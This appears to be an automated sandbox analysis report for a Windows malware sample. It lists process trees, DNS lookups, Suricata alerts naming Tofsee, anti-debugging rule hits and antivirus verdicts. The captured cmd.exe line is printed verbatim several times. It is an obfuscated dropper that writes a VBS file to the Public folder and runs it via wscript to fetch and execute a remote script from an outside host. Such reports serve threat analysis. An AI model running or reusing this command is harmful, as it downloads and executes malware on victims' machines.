Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 14, 2023, 2:33 p.m. | Sept. 14, 2023, 2:35 p.m. |
Process | Command line | PID |
---|---|---|
cmd.exe | C:\Windows\system32\cmd.exe /c echo\|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo\|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs | 496 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo" | 2104 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs" | 2140 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo" | 2224 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs" | 2260 |
wscript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Public\sm86fa81.vbs" | 2388 |
Name | Response | Post-Analysis Lookup |
---|---|---|
mgwdg.jungleheart.com | 206.71.149.162 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
UDP 192.168.56.103:52760 -> 164.124.101.2:53 | 2035988 | ET INFO DYNAMIC_DNS Query to a *.jungleheart .com Domain | Potentially Bad Traffic |
TCP 206.71.149.162:443 -> 192.168.56.103:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.103:49172 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 206.71.149.162:443 -> 192.168.56.103:49174 | 2260001 | SURICATA Applayer Wrong direction first Data | Generic Protocol Command Decode |
Suricata TLS
No Suricata TLS
Key | Value |
---|---|
pdb_path | C:\U2\wx6\Release\wx6.pdb |
file | C:\Users\Public\sm86fa81.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs" |
cmdline | C:\Windows\system32\cmd.exe /c echo\|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo\|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo" |
Rule | Description |
---|---|
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |
Engine | Detection |
---|---|
Bkav | W32.AIDetectMalware |
FireEye | Generic.mg.87f6774e25128d08 |
BitDefenderTheta | Gen:NN.ZexaF.36662.xuW@amwLjzhi |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
APEX | Malicious |
Cynet | Malicious (score: 100) |
Rising | Trojan.Generic@AI.96 (RDML:dDIpoxiglDXj0hXpLNu+UA) |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
DeepInstinct | MALICIOUS |
CrowdStrike | win/malicious_confidence_100% (D) |
file | C:\Windows\SysWOW64\wscript.exe |